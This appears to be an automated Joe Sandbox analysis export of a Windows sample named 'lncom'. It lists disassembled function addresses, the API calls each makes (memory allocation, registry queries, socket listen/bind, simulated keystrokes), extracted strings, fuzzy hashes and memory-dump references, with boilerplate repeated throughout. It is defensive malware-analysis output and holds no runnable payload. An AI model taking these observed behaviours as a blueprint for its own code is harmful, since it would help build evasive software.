Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ExtentPoint32Text
String ID:
API String ID: 223599850-0
Opcode ID: 2c15cc52eb1e6f82869aac23fd9a9d7c887f8d9cd04aa921133473914a87a3d2
Instruction ID: 27a46c89e6c0ce6ddcb18b154fcb195468995c5581eb8856f722477beb74c606
Opcode Fuzzy Hash: 2c15cc52eb1e6f82869aac23fd9a9d7c887f8d9cd04aa921133473914a87a3d2
Instruction Fuzzy Hash: 99E0ECA63012115F8750EF7E5CD1A6BAEDD9E8D626318447FF94CC3303DA68DC058768

Uniqueness

Uniqueness Score: -1.00%

Function 00478E0C Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00478E59), ref: 00478E34

Part of subcall function 0048F5C8: GetLastError.KERNEL32(00000000,I;,?,00000000), ref: 0048F5E2

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: DestroyErrorLastWindow
String ID:
API String ID: 1182162058-0
Opcode ID: be19ae078d972d8e0d7bcfa9ef7bfa1232cdebca41452234e72b968c165ae19e
Instruction ID: 72fe63a2128321271acb676ad5cfe48a3c54f252c11609ed67dd36464e4659f5
Opcode Fuzzy Hash: be19ae078d972d8e0d7bcfa9ef7bfa1232cdebca41452234e72b968c165ae19e
Instruction Fuzzy Hash: CEF0A030604304EFE711DB59DA06D9A77E8EB08B00B6244AAF908D3611E7389D009658

Uniqueness

Uniqueness Score: -1.00%

Function 0048B09C Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,0045BA76,00000000,0045BB01,?,00000000,0045BB29,?,?), ref: 0048B0C9

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: f5a84c8343039f89b332fd37320683fbe6e60c253af9096bcaef7f66dc08259e
Instruction ID: 6391b9b80e93811b4b53729ebbbe5c818cefd76d2fa02b548721e9a8730edfcf
Opcode Fuzzy Hash: f5a84c8343039f89b332fd37320683fbe6e60c253af9096bcaef7f66dc08259e
Instruction Fuzzy Hash: 0DD092E13006212BDA55BA7E0C92F9F4D8C8B0E61AB00023AB608E6243C99CEE4542AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,?,00401214), ref: 00401167

Part of subcall function 00494D78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00401173,00400000,?,00000105,?,00401214), ref: 00494D94
Part of subcall function 00494D78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105,?,?,?,00401173,00400000,?,00000105), ref: 00494DB2
Part of subcall function 00494D78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F003F,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 00494DD0
Part of subcall function 00494D78: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00494E44,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?), ref: 00494E0A
Part of subcall function 00494D78: RegQueryValueExA.ADVAPI32(?,00494F70,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,00494E44,?,80000001), ref: 00494E28
Part of subcall function 00494D78: RegCloseKey.ADVAPI32(?,00494E4B,00000000,?,?,00000000,00494E44,?,80000001,Software\Borland\Locales,00000000,000F003F,?,00000000,?,00000105), ref: 00494E3E

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FileModuleNameOpenQueryValue$Close
String ID:
API String ID: 1918644479-0
Opcode ID: b49ac346b379347ebe731db9d89c4e8c67ebcdaf26b666a30e148284fa0014c4
Instruction ID: ed6ba5d517c3595dd0ae793caad8c57b8a06a82d54042fa760236d44a352cf22
Opcode Fuzzy Hash: b49ac346b379347ebe731db9d89c4e8c67ebcdaf26b666a30e148284fa0014c4
Instruction Fuzzy Hash: A7E026B06006008BC710DBACACC9A42378C9748304B00413B7904CB362EBBC893457AE

Uniqueness

Uniqueness Score: -1.00%

Function 0048B614 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,00000000,0043EEBF), ref: 0048B61F

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: e40a5df50a098faf6f2375c32d248f2a7612fa1570ae341d42badbcec3b6c88a
Instruction ID: 6265b6c403ab877ec57f809fcbd88e8b4394924f3f155ac92c4d23feb9eb4905
Opcode Fuzzy Hash: e40a5df50a098faf6f2375c32d248f2a7612fa1570ae341d42badbcec3b6c88a
Instruction Fuzzy Hash: F8B012B039020A074E10B9FE4CC1D1940CC465D2053402B3F7006C3183DC2CD4044228

Uniqueness

Uniqueness Score: -1.00%

Function 004329B8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,00432B0C,?,00000000,00000000), ref: 004329C3

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: fab77becd08dd4e7e095529d06808422315499433f639a9140000129e9f68217
Instruction ID: e05e3272478d69f3638f4514d2336b76e0f7a443c755d7fc0f6765699e4f36c9
Opcode Fuzzy Hash: fab77becd08dd4e7e095529d06808422315499433f639a9140000129e9f68217
Instruction Fuzzy Hash: 4EB09B71C0830CBB4B04E7D9A50184D77EC9604214710445BF20CD3101D5356E005668

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED94 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(?,00000006), ref: 0040ED9C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0fa9829f383cdbdd8707bb4431671414dbe00bfc237adfffdbcad91c18f4b72d
Instruction ID: a907f009d4046a3ceac266c07a1fda126107002fbf731671a6f156baf172f12e
Opcode Fuzzy Hash: 0fa9829f383cdbdd8707bb4431671414dbe00bfc237adfffdbcad91c18f4b72d
Instruction Fuzzy Hash: 8BA0122104020C32C9102982DD02A453E1D5701A94E000015B50C090614A53546040A5

Uniqueness

Uniqueness Score: -1.00%

Function 004A00DC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,0049F4F9,?,00000000,?,0049F52C,00000001,00000000,?,?,0049F46C,00000001,?,00495ED3,Illegal mode in _vector_new_), ref: 004A00E3

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 998547d64f594728e4a711d2af9e0bc81755f7a5af41b61b03125dfeb8df547d
Instruction ID: bedfebb089d5a4553af8efb6b581082ea3f87d15e476832c3121803eaf87449e
Opcode Fuzzy Hash: 998547d64f594728e4a711d2af9e0bc81755f7a5af41b61b03125dfeb8df547d
Instruction Fuzzy Hash: 04A0045555430CD74D40F5DFD445CD577DC550C5547444417F50447501DD75F54045F5

Uniqueness

Uniqueness Score: -1.00%

Function 00491310 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 0049137D

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 88140ed021955815d1c06d62a6b7d25611904c5641fd1ead5522cc823e1e93c1
Instruction ID: aba201a9bf8e6ae3e84dd8d03fed955ae547aaf3f858abc6bfe9e08bfc5123fa
Opcode Fuzzy Hash: 88140ed021955815d1c06d62a6b7d25611904c5641fd1ead5522cc823e1e93c1
Instruction Fuzzy Hash: 84117072A057029BD720DF19C88062FBBE5EBC4760F16C93EE99847B64D735AC408655

Uniqueness

Uniqueness Score: -1.00%

Function 00465A2C Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,00000000,?,00465B83,?,0043A112,00000080,00465AD8,00465B98,80000000,00000000), ref: 00465A4A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 949d80fb9b7dd465f4f91eb0e63294ad8f67cf8d2fa290c32ac06d46159e9f2c
Instruction ID: 07940ce4d8c72c518f0b9ce70526ac54a209485696e19b72ef6fe1ee1b89fcc2
Opcode Fuzzy Hash: 949d80fb9b7dd465f4f91eb0e63294ad8f67cf8d2fa290c32ac06d46159e9f2c
Instruction Fuzzy Hash: C01125742406059FC720DF59D8C1A82BBE4EB58350F14C63BE9988F399E374A805CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004913A4 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,023789A4,0237C9A7,0049160B), ref: 004913FE

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 58b70072ea3665de67a791cf635a2fe3f5945b24b0af0dc6cf774244eb057f26
Instruction ID: f10b711185824fba9a4739d4f4b7a6b6a706ece0ebeb6d4d78dfffe41da5488e
Opcode Fuzzy Hash: 58b70072ea3665de67a791cf635a2fe3f5945b24b0af0dc6cf774244eb057f26
Instruction Fuzzy Hash: D10124726082118BD7209F28DCC0A2B7BE4EBA4720F06453EDE8587311D33B6C0187A4

Uniqueness

Uniqueness Score: -1.00%

Function 00490FD8 Relevance: 1.3, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,005DB0E4,0049103B,?,?,0049123B,?,00100000,00002000,00000004,005DB0F4,?,?), ref: 00490FEB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: c62fc2ee8e43fd165e5c5f8c105dcd39629e3e3f4d7661fc565eb0add7ee267d
Instruction ID: 1ce302bec181db37b2bcb404629f9c98f00ef2316e6eaa617b8ab6098d7fc41b
Opcode Fuzzy Hash: c62fc2ee8e43fd165e5c5f8c105dcd39629e3e3f4d7661fc565eb0add7ee267d
Instruction Fuzzy Hash: CBF05E75701201CFEB34CF29D8806567BE6EBA9319F21807FD184C7750D7368C419B50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00435208 Relevance: 54.4, APIs: 24, Strings: 7, Instructions: 198COMMON

Download Yara Rule

APIs

@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00435248

Part of subcall function 004360D8: @Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,004361B6), ref: 00436105
Part of subcall function 004360D8: @Wsocket@WSocketErrorDesc$qqri.LNCOM(004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436133
Part of subcall function 004360D8: @Wsocket@WSocket_closesocket$qqri.LNCOM(?,004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436163
Part of subcall function 004360D8: @Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 0043617A

@Wsocket@WSocket_WSASetLastError$qqri.LNCOM ref: 0043523B

Part of subcall function 004318F4: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00431909

@Wsocket@WSocket_WSASetLastError$qqri.LNCOM ref: 00435263
@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00435270

Strings

WSAASyncSelect, xrefs: 00435519
listen: protocol not assigned, xrefs: 00435268
listen: address not assigned, xrefs: 00435290
Listen, xrefs: 004354D1
socket, xrefs: 00435411
Bind, xrefs: 00435454
listen: port not assigned, xrefs: 00435240

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Socket$AnsiCustomLastSocket@Socket_StringSystem@$Error$qqr17Error$qqri$ChangeDesc$qqriErrorError$qqrvProc$qqrx17Socket_closesocket$qqriStateState$qqr20
String ID: Bind$Listen$WSAASyncSelect$listen: address not assigned$listen: port not assigned$listen: protocol not assigned$socket
API String ID: 2809067933-2060407345
Opcode ID: 99f2fcdab3ca38625867d15a61e818bb762aec48618999d0f489284d0c4b67e0
Instruction ID: dd77d1c089af190cd2b9885993e0fb1ac4b1a18a17ffca5cc5d9016dd280003d
Opcode Fuzzy Hash: 99f2fcdab3ca38625867d15a61e818bb762aec48618999d0f489284d0c4b67e0
Instruction Fuzzy Hash: 6E915A74A04548EFCB00DB98C685BAEB7F1EF48304F2561FAE5049B362D778AE44DB49

Uniqueness

Uniqueness Score: -1.00%

Function 0049B10C Relevance: 40.7, APIs: 9, Strings: 14, Instructions: 481threadCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E,?), ref: 0049B16A
GetUserDefaultLCID.KERNEL32(?), ref: 0049B26E
GetLocaleInfoA.KERNEL32(?,0000000B,?,00000007,?), ref: 0049B282
IsValidLocale.KERNEL32(?,00000001,?,0000000B,?,00000007,?), ref: 0049B4EF
SetLastError.KERNEL32(20000103,?,00000001,?,0000000B,?,00000007,?), ref: 0049B505

Part of subcall function 0049C0B4: GetLocaleInfoA.KERNEL32(?,00001001,?,00000200,0000000B,00000001,?,?,0049BAC7,?,LC_CTYPE,0000000B,?,00000007,?), ref: 0049C0DB
Part of subcall function 0049C0B4: GetLocaleInfoA.KERNEL32(?,00001002,00000000,00000200), ref: 0049C128

SetThreadLocale.KERNEL32(?,?,00000001,?,0000000B,?,00000007,?), ref: 0049B53A

Part of subcall function 0049B918: SetLastError.KERNEL32(0000000E,005D7334,?,00000000,?,0049B55F,00000000,00000000,?,?,00000001,?,0000000B,?,00000007,?), ref: 0049B958

SetLastError.KERNEL32(20000102,?,00000007,?), ref: 0049B56B

Part of subcall function 0049B614: RtlLeaveCriticalSection.NTDLL(02370864), ref: 0049B61A

GetCPInfo.KERNEL32(?,?,?,00000007,?), ref: 0049B5AF
SetLastError.KERNEL32(20000106,?,00000007,?), ref: 0049B5C2

Strings

en_US, xrefs: 0049B29F
4s], xrefs: 0049B126
LC_COLLATE, xrefs: 0049B22B
LC_TIME, xrefs: 0049B213
en_GB, xrefs: 0049B305
LC_CTYPE, xrefs: 0049B243
LC_MONETARY, xrefs: 0049B1DF
LC_NUMERIC, xrefs: 0049B1F9
fr_FR, xrefs: 0049B36B
FRA, xrefs: 0049B37F
de_DE, xrefs: 0049B3CE
ENG, xrefs: 0049B319
DEU, xrefs: 0049B3E2
ENU, xrefs: 0049B2B3

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ErrorLastLocale$Info$CriticalDefaultLeaveSectionThreadUserValid
String ID: 4s]$DEU$ENG$ENU$FRA$LC_COLLATE$LC_CTYPE$LC_MONETARY$LC_NUMERIC$LC_TIME$de_DE$en_GB$en_US$fr_FR
API String ID: 3299130240-3460334633
Opcode ID: 29b9a5d3395b96c93582ed6dc0fe42cbffc1921100723e93a5154288db609415
Instruction ID: c2f8aecd548973d8da6ee4fbfeeecb05c5cf9c01ed4d77c7e0787459e5d6a6ff
Opcode Fuzzy Hash: 29b9a5d3395b96c93582ed6dc0fe42cbffc1921100723e93a5154288db609415
Instruction Fuzzy Hash: F7E1F671A002056BCF24EA7AAD82A6FBFA5EF49314B15413FF40597342EB78D940C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 0042A528 Relevance: 27.1, APIs: 18, Instructions: 81keyboardsleepCOMMON

Download Yara Rule

APIs

keybd_event.USER32(00000090,00000000,00000000,00000000), ref: 0042A53F
keybd_event.USER32(00000090,00000000,00000002,00000000), ref: 0042A54F
Sleep.KERNEL32(00000064,00000090,00000000,00000002,00000000), ref: 0042A556
keybd_event.USER32(00000090,00000000,00000000,00000000), ref: 0042A566
keybd_event.USER32(00000090,00000000,00000002,00000000), ref: 0042A576
